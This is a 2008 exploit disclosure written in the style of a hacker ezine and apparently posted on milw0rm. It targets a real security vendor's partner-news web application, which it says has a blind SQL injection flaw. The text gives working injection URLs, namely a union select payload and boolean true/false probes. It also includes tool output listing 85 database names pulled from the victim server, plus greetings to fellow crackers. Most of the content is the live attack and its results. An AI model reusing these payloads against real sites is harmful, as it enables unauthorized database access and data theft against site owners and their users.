??????????????????????????????????????????????????????????????????????????????? ?? C r a C k E r ?? ?? T H E C R A C K O F E T E R N A L M I G H T ?? ?????????????????????????????????????????????????????????????????????????????? ????? From The Ashes and Dust Rises An Unimaginable crack.... ????? ?????????????????????????????????????????????????????????????????????????????? ?? [ EZINE ] ?? ?????????????????????????????????????????????????????????????????????????????? : Author : CraCkEr : : : ? Website : symantec.com ? ? Famous Sites Can Be ? ? Vuln Type: Blind SQL Injection ? ? ? ? Method : GET ? ? Olso Vulned ? ? Critical : High [????????] ? ? ? ? Impact : Database access ? ? ? ? ????????????????????????????????????? ???????????????????????????????????? ? ? DALnet #crackers ?? ?????????????????????????????????????????????????????????????????????????????? : : ? Release Notes: ? ? ????????????? ? ? Typically used for remotely exploitable vulnerabilities that can lead to ? ? system compromise. ? ? ? ?????????????????????????????????????????????????????????????????????????????? ?? Exploit URL's ?? ?????????????????????????????????????????????????????????????????????????????? [+] Remote SQL http://partnernews.symantec.com/2008/03/index.php?p=lp&l=-1 union select 1,2,3-- [+] Blind SQL http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=1 http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=0 [+] Text Change Bedriftsfordelene ved sosiale nettverk [+] Attack Results [+] URL:http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found! [+] Showing all databases current user has access too! [+] 18:00:05 [+] Number of Rows: 85 [0]: hv_kompaktseminar_2008 [1]: 3ds_statistics [2]: channelevent [3]: cpu_expertenforum_2008 [4]: cpu_xmas_2007 [5]: db_bt [6]: db_bt2008 [7]: db_elearning [8]: db_elearning2 [9]: db_farbreiz [10]: db_hpcd [11]: db_jsdesk [12]: db_pepper_oktoberfest2008 [13]: db_ship [14]: db_shop [15]: db_shrek [16]: db_shrek_handover [17]: db_symantec [18]: db_wordstock [19]: demo_3ds_statistics [20]: demo_ajaxfb [21]: demo_bettgefluester [22]: demo_compel_bs [23]: demo_compel_tec [24]: demo_db_elearning [25]: demo_hp_smb_portal [26]: demo_hpsmartportal [27]: demo_hpsmartportal_at [28]: demo_hpsmartportal_at_ch [29]: demo_hpsmartportal_ch [30]: demo_hpsmartportal_de [31]: demo_hpsmartportal_nl [32]: demo_hpsmartportal_nl_int [33]: demo_iqpower [34]: demo_kanalm [35]: demo_panadress [36]: demo_panadress_old [37]: demo_pepper_joomla [38]: demo_pepper_website [39]: demo_pepperglobal [40]: demo_pepperglobal_new [41]: demo_phpproject [42]: demo_preferred [43]: demo_preferred_demo [44]: demo_symantec [45]: demo_test [46]: demo_zukunftspodium [47]: hp_elearning [48]: hp_elearning_2 [49]: hp_mobiles-rechenzentrum [50]: hp_mobiles-rechenzentrum_handover [51]: hp_smb_portal [52]: hv_management_2007 [53]: hv_management_2008 [54]: linde_ltip_08 [55]: linde_mtip_07 [56]: linde_tilia_edm [57]: mysql [58]: oktoberfest2007 [59]: oktoberfest_2008 [60]: opengeodb [61]: partnernews_sep09 [62]: pepperglobal [63]: pepperglobal_new [64]: pepperglobal_statistics [65]: phpmyadmin [66]: preferred [67]: preferred_handover [68]: remoteshell [69]: robertdill [70]: symantec_ddc_2 [71]: symantec_partnernews [72]: symantec_partnernews_0108 [73]: symantec_partnernews_0208 [74]: symantec_partnernews_0308 [75]: symantec_partnernews_0408 [76]: symantec_partnernews_0508 [77]: symantec_partnernews_0608 [78]: symantec_partnernews_0708 [79]: symantec_partnernews_0908 [80]: symantec_partnernews_handover [81]: symantec_wordstock [82]: tenovis_wcp_3_0 [83]: transcat_statistics [84]: webcast_portal_3_3 [-] 00:58:04 [-] Total URL Requests 10602 [-] Done ?????????????????????????????????????????????????????????????????????????????? Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL . ?????????????????????????????????????????????????????????????????????????????? ?? © CraCkEr 2008 ?? ?????????????????????????????????????????????????????????????????????????????? # milw0rm.com [2008-10-07]